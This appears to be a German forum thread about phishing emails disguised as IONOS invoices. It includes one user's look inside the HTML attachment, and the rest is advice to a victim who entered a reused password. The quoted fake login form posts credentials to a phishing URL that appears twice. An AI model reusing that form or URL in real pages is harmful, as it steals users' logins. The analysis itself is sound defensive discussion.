Phishing mail

[roedert]

Genau so sehen die echten Mailinfos zu meinen Ionos-Rechnungen auch aus. Auch mit HTML-Anhang.

Meine IONOS-Rechnungen kamen bisher immer als angehangenes pdf - nie als html

 

[Difool]

Ich hatte diese Mails auch bekommen und hatte bei ionos angerufen und Bescheid gesagt.
Die wussten das bereits; meinte zum Support, dass sie doch mal im Login-Bereich einen Info-Teil
für so etwas anlegen könnten, dass man darüber informiert werden kann usw.

Habe eben mal in diese html-Datei im Mail-Anhang mit BBEdit reingeschaut.
Da ist ein "unescape"-javascript drin und auch eine Art Keylogger mit javascript für den vermeintlichen Login-Button des Anhangs.

Gerade mal das elend lange javascript "escaped" – man logged sich dann quasi da ein; oder die Anmelde-Daten gehen dorthin:

<form id="login-form" class="form content-elem"
   action="https://email-businessionos.su/ionos/api.php" method="post" >
<legend class="hidden" data-i18n="oao.login.heading" data-i18n-attr="text">Webmail Login</legend>

Diese html-Datei einfach nur im Browser aufzurufen, sollte imo nichts gravierendes passieren (mit macOS) –
wenn man den Login dort nicht benutzt, weil sonst eine Application von folgender Adresse geladen wird:

https://email-businessionos.su/ionos/api.php

…und das könnte dann evtl. etwas "ungeil" sein.

 

[Finnsen_1]

Hallo zusammen,
ich hänge mich gerade einmal an den Thread an, da ich dann irgendwann doch etwas kopflos auf solch einen Login geklickt habe.

Was wird da ggf. nun passieren? Mail + Passwort ist weg? Ich müsste also auf jeder Seite, wo ich die Login Kombi verwende, mein Passwort ändern? Banking etc verwendet ein anderes PW.
MacBook ggf. nun ebenfalls infiltriert?

 

[oneOeight]

Was wird da ggf. nun passieren? Mail + Passwort ist weg? Ich müsste also auf jeder Seite, wo ich die Login Kombi verwende mein Passwort ändern? Banking etc verwendet ein anderes PW.

D.h. du hast login/Passwort mehrfach verwendet?
Dann solltest du das überall getrennt ändern.
Das Login der Mail Adresse war es nicht?
Falls ja, dann dort zuerst, wenn möglich 2FA aktivieren.

 

[Finnsen_1]

D.h. du hast login/Passwort mehrfach verwendet?
Dann solltest du das überall getrennt ändern.
Das Login der Mail Adresse war es nicht?
Falls ja, dann dort zuerst, wenn möglich 2FA aktivieren.

Genau. Dies war mein Standard Passwort für alle möglichen Seiten, wo man einen Account braucht.
Alles was Mails und Banking angeht hat ein anderes Passwort.

Kann ich über den Mac alles ändern? Oder besteht hier ein Risiko durch Keylogger o.ä?

 

[oneOeight]

Kann ich über den Mac alles ändern? Oder besteht hier ein Risiko durch Keylogger o.ä?

Hast du von der Seite irgendwas runter geladen und installiert?
Falls nicht, dann solltest du auch keinen Keylogger darüber gefangen haben.

 

[Finnsen_1]

Hast du von der Seite irgendwas runter geladen und installiert?
Falls nicht, dann solltest du auch keinen Keylogger darüber gefangen haben.

Ne habe nur völlig planlos meine Mail und mein Passwort eingetragen und auf Login geklickt. Dann kam nur noch ein 500er Fehler und mir ist mein Fehler bewusst geworden.

 

[Killerkaninchen]

Na dann gibt‘s nur eines:
Überall, wo du dieses Passwort verwendest, dieses ändern. Und zwar hoppigaloppi!

 

[Finnsen_1]

Okay, sobald ich wieder zu Hause bin mache ich das. Hoffe ~5h Zeitfenster richten keinen Schaden an.
Ich danke euch für die sau schnelle Hilfe!

 

[Difool]

Ne habe nur völlig planlos meine Mail und mein Passwort eingetragen und auf Login geklickt. Dann kam nur noch ein 500er Fehler und mir ist mein Fehler bewusst geworden.

Ja, diesen eingegebenen Benutzernamen und das dazugehörige Passwort als "verseucht" betrachten und überall,
wo diese verwendet wurden schnellstens ändern.

Man darf davon ausgehen, dass diese Kombination nun möglicherweise in einem "Harvester-Script" integriert worden sein können und
alle möglichen Plattformen automatisiert durchgehen, bei denen solch' eine Anmeldeformation zutreffen kann.

 

[Killerkaninchen]

Okay, sobald ich wieder zu Hause bin mache ich das. Hoffe ~5h Zeitfenster richten keinen Schaden an.
Ich danke euch für die sau schnelle Hilfe!

Ich fürchte, leider bist du es, auf dessen "sau schnelles" Handeln es nun ankommt.

5 Stunden? Sorry, als mein eBay-Account gekapert wurde, hatte ich schon wegen 10 Minuten Heimweg den Angstschweiß auf der Stirn, bis ich die Möglichkeit hatte, das Schlimmste zu verhindern.

 

[ruerueka]

@Finnsen_1 leg dir einen Passwortmanager zu, dann geht das mit den vielen unterschiedlichen Passwörtern schmerzlos..

 

[Killerkaninchen]

@Finnsen_1 leg dir einen Passwortmanager zu, dann geht das mit den vielen unterschiedlichen Passwörtern schmerzlos..

Ein sehr guter Ratschlag, der jedoch leider rein präventiver Natur ist.
Für @Finnsen_1 ist Polen jetzt offen, da beißt die Maus keinen Faden ab.

 

[forestgump]

Seitdem 1und1 meine Domain nicht mehr hostet, haben die Phishing mails auch aufgehört. Meine Freundin führt ihre Mails weiterhin über 1und1 und bekommt wöchentlich ca. 100 Spammails

 

[dg2rbf]

Hi,
1 und 1, und web.de, sind ein rotes Tuch für mich, würde niemals etwas bei diesen Saftläden hosten.
LG Franz

 

[Finnsen_1]

Ja, ist wirklich eine Katastrophe.
Und der Absender ist extrem gut mit noreply @ionos.de getarnt. Kp wie das geht oder das Ionos da nicht intervenieren kann.

 

[JARVIS1187]

Ja, ist wirklich eine Katastrophe.
Und der Absender ist extrem gut mit noreply @ionos.de getarnt. Kp wie das geht oder das Ionos da nicht intervenieren kann.

Kannste halt nix machen. Jeder kann auch ne Mail mit dem Absender timcook @apple.com versenden. Ist dann zwar nicht authentifiziert (und kann daher auch von Maildiensten abgefangen/gefiltert werden), aber das ist viel zu leicht machbar.

 

[dg2rbf]

Hi,
Solange das E-Mail System nicht komplett auf einheitliche Verschlüsselung weltweit umgestellt worden ist, ist das ein Chaos ohne Ende.
LG Franz

 

[Finnsen_1]

Kurz noch eine andere Frage.
Ich habe in meinem Chrome Browser zusätzlich noch den Cache und alle Cookies einmal gelöscht. Jetzt geht hier gefühlt kein Seitenaufbau mehr in einer annehmbaren Geschwindigkeit.
Bin ich gerade nur etwas zu sensibel oder könnte hier doch schlimmeres passiert sein?

 

[ruerueka]

Kurz noch eine andere Frage.
Ich habe in meinem Chrome Browser zusätzlich noch den Cache und alle Cookies einmal gelöscht. Jetzt geht hier gefühlt kein Seitenaufbau mehr in einer annehmbaren Geschwindigkeit.
Bin ich gerade nur etwas zu sensibel oder könnte hier doch schlimmeres passiert sein?

Zur Geschwindigkeit: das legt sich, wenn alle Seiten und der Werbemüll wieder im Cache sind.
Zur Empfindlichkeit:
a. Lass Malwarebytes über deinen Rechner laufen. Und in ein paar Tagen nochmal. Kostenlose Version genügt.
b. Ändere - sofern noch nicht geschehen (was echt fahrlässig wäre), alle Zugänge, bei denen die "verbrannte" Kombination verwendet wurde.
c. Ändere am besten alle anderen Zugänge auch und stelle sicher, dass für jeden Dienst ein eigenes komplexes Passwort verwendet wird. Nimm einen Passwortmanager dafür.
d. Lösche, während du c) abarbeitest, alle Zugänge, die du nicht mehr brauchst. Macht das Leben leichter.
e. Klebe einen Zettel an den Monitor: "Ich klicke keine Links mehr in Mails an!"
f. Schreibe diesen Satz jeden Abend 100 mal vor dem Einschlafen... Von Hand, kein Copy/Paste
;-)